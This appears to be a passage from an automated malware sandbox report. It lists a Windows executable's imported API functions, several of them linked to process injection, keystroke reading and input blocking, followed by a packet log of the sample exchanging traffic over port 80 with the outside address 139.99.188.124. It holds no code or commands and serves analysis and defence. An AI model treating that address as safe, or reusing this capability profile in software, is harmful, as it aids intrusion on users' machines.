                                                                    KERNEL32.dllWaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, GetLongPathNameW, GetShortPathNameW, DeleteFileW, FindNextFileW, CopyFileExW, GetFullPathNameW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, LoadResource, LockResource, SizeofResource, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, LoadLibraryW, GetLocalTime, CompareStringW, EnterCriticalSection, DuplicateHandle, GetStdHandle, CreatePipe, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, VirtualAlloc, SetCurrentDirectoryW, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, RtlLookupFunctionEntry, RtlVirtualUnwind, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, IsProcessorFeaturePresent, GetSystemTimeAsFileTime, CreateThread, GetCurrentProcess, GetCurrentThread, LeaveCriticalSection, InitializeSListHead, RtlUnwindEx, RtlPcToFileHeader, SetLastError, TlsAlloc, ResetEvent, WaitForSingleObjectEx, TlsGetValue, TlsSetValue, TlsFree, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, ResumeThread, FreeLibraryAndExitThread, GetACP, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetStringTypeW, GetFileType, SetStdHandle, GetConsoleCP, GetConsoleMode, ReadConsoleW, GetTimeZoneInformation, FindFirstFileExW, IsValidCodePage, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetEnvironmentVariableA, CloseHandle, WriteConsoleW, MoveFileW, RtlCaptureContext
                                                                    USER32.dllGetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, GetWindowLongW, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongPtrW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, SetWindowLongPtrW, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, PeekMessageW, GetInputState, UnregisterHotKey, CharLowerBuffW, MonitorFromPoint, MonitorFromRect, LoadImageW, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, IsCharUpperW, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, CheckMenuRadioItem, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, GetClipboardData, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, IsCharLowerW, IsCharAlphaNumericW, IsCharAlphaW, GetKeyboardLayoutNameW, ClientToScreen, RegisterHotKey, GetCursorInfo, SetWindowPos, CopyImage, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, SetMenuDefaultItem, CloseClipboard, GetWindowRect, SetUserObjectSecurity, IsClipboardFormatAvailable, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, OpenClipboard, GetWindowLongPtrW
                                                                    GDI32.dllEndPath, DeleteObject, GetDeviceCaps, ExtCreatePen, StrokePath, SetPixel, CloseFigure, LineTo, AngleArc, MoveToEx, Ellipse, PolyDraw, GetTextExtentPoint32W, CreateCompatibleBitmap, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, GetStockObject, CreateDCW, GetPixel, DeleteDC, GetDIBits, StretchBlt, SelectObject, CreateCompatibleDC, StrokeAndFillPath
                                                                    COMDLG32.dllGetSaveFileNameW, GetOpenFileNameW
                                                                    ADVAPI32.dllGetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, FreeSid, GetTokenInformation, RegSetValueExW, GetSecurityDescriptorDacl, GetAclInformation, RegCreateKeyExW, AddAce, SetSecurityDescriptorDacl, InitiateSystemShutdownExW, GetUserNameW
                                                                    SHELL32.dllDragFinish, DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW
                                                                    ole32.dllCoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket
                                                                    OLEAUT32.dllVariantChangeType, DispCallFunc, CreateStdDispatch, CreateDispTypeInfo, UnRegisterTypeLib, UnRegisterTypeLibForUser, RegisterTypeLibForUser, RegisterTypeLib, LoadTypeLibEx, VariantCopyInd, VariantTimeToSystemTime, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, VariantInit, VariantClear, VariantCopy, SysAllocString, SafeArrayCreateVector, VarR8FromDec, SafeArrayAllocDescriptorEx, SafeArrayAllocData, SysStringLen, SafeArrayGetVartype, OleLoadPicture, QueryPathOfRegTypeLib, SysReAllocString, SafeArrayAccessData
                                                                    Language of compilation systemCountry where language is spokenMap
                                                                    EnglishGreat Britain
                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                    Dec 18, 2024 09:19:17.242662907 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:17.362320900 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:17.362404108 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:17.368194103 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:17.487787008 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:18.869863033 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:18.870023012 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:18.870079041 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:18.870116949 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:18.870152950 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:18.870148897 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:18.870188951 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:18.870204926 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:18.870225906 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:18.870229006 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:18.870281935 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:18.870316982 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:18.870322943 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:18.870353937 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:18.870440960 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:18.990921974 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:18.990938902 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:18.991019011 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:18.994107008 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.045485973 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:19.082617998 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.082707882 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.082815886 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:19.086786032 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.086967945 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.087023973 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:19.095278025 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.095372915 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.095501900 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:19.103566885 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.103656054 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.103842974 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:19.111943007 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.112055063 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.112112999 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:19.120337009 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.120462894 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.120516062 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:19.128731966 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.128837109 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.128892899 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:19.137088060 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.137213945 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.137335062 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:19.145478964 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.145550966 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.145606041 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:19.153909922 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.154124022 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.154211044 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:19.165056944 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.165115118 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.165189028 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:19.295406103 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.295553923 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.295617104 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:19.298109055 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.298325062 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.298454046 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:19.303560972 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.303657055 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.303711891 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:19.309226036 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.309237957 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.309288979 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:19.314591885 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.314605951 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.314650059 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:19.319933891 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.320046902 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.320101023 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:19.325396061 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.325491905 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.325591087 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:19.330780029 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.330889940 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.330928087 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:19.336186886 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.336306095 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.336364031 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:19.341681957 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.341782093 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.341820002 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:19.347148895 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.347237110 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.347296000 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:19.352494955 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.352638960 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.352786064 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:19.357964993 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.358083963 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.358124971 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:19.363429070 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.363528967 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.363568068 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:19.368911982 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.369024038 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.369072914 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:19.374294996 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.420484066 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:19.508066893 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.508155107 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.508311033 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:19.510041952 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.510190964 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.510242939 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:19.514544010 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.514723063 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.514816046 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:19.519157887 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.519237041 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.519342899 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:19.523561954 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.523684978 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.523729086 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:19.528117895 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.528233051 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.528270006 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:19.532577991 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.532699108 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.532754898 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:19.537209034 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.537244081 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.537297010 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:19.541662931 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.541848898 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.541914940 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:19.546227932 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.546343088 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.546418905 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:19.550745964 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.550896883 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.550947905 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:19.555196047 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.555303097 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.555387020 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:19.559705019 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.559770107 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.560158014 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:19.564244986 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.564316034 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.564526081 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:19.568870068 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.569135904 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.569200039 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:19.573158026 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.573285103 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.573362112 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:19.577681065 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.577827930 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.577881098 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:19.582195044 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.582371950 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.582429886 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:19.587204933 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.587346077 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.587409019 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:19.592494011 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.592525959 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.592595100 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:19.596820116 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.596947908 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.596999884 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:19.600747108 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.600877047 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.600929022 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:19.604734898 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.604840994 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.604892015 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:19.609213114 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.609364986 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.609411955 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:19.613739014 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.613874912 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.613950014 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:19.720458031 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.720654011 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.720715046 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:19.722275019 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.722383022 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.722453117 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:19.725878954 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.725991964 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.726155043 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:19.729528904 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.729655981 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.729777098 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:19.733105898 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.733247995 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.733290911 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:19.736577988 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.736670971 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.736851931 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:19.739986897 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.740109921 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.740199089 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:19.743428946 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.743529081 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.743592024 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:19.746777058 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.746877909 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.747179031 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:19.750112057 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.750281096 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.750410080 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:19.753446102 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.753547907 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.753643036 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:19.756886959 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.756952047 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.757025957 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:19.760286093 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.760488033 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.760631084 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:19.763561010 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.763679028 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.763734102 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:19.766891956 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.767014027 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.767071009 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:19.770248890 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.770334959 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.770435095 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:19.773591995 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.773695946 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.773750067 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:19.776951075 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.777095079 CET8049721139.99.188.124192.168.2.6
